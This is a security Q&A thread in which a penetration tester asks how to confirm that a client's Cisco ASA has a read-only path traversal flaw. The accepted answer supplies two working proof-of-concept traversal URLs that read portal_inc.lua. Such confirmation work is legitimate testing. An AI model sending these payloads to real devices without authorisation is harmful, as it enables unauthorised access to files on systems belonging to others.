# Fingerprinting Cisco ASA Device

Tags: nmap, vulnerability-scanners, fingerprinting, cisco, nessus

I have used Nessus to determine that a client's Cisco ASA is vulnerable to a [Read-Only Path Traversal Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86). So far I have tried viewing the logon portal page source code, `nmap -sV -A <host>`, the nmap script `http-cisco-anyconnect` and `ssh -vvv -p port <host>` with no luck at obtaining any information about the device, its OS, or patch status.

The advisory from Cisco states:

> The vulnerability is due to a lack of proper input validation of URLs
> in HTTP requests processed by an affected device. An attacker could
> exploit this vulnerability by sending a crafted HTTP request
> containing directory traversal character sequences to an affected
> device.

This work is part of an external penetration test, and I do not have access to the device from their internal network.

Can anyone provide any additional techniques to obtain device information or describe how I may construct a HTTP request with path traversal characters in order to confirm this device is vulnerable?

Comment: Doesn't Nessus provide that info? It usually provides proof or ways to replicate the finding.

Answer (score 0, accepted):

There are [publicly posted Proof of Concept URLs](https://twitter.com/aboul3la/status/1286012324722155525) that can be used to test for this vulnerability:

```
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```

and

```
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
```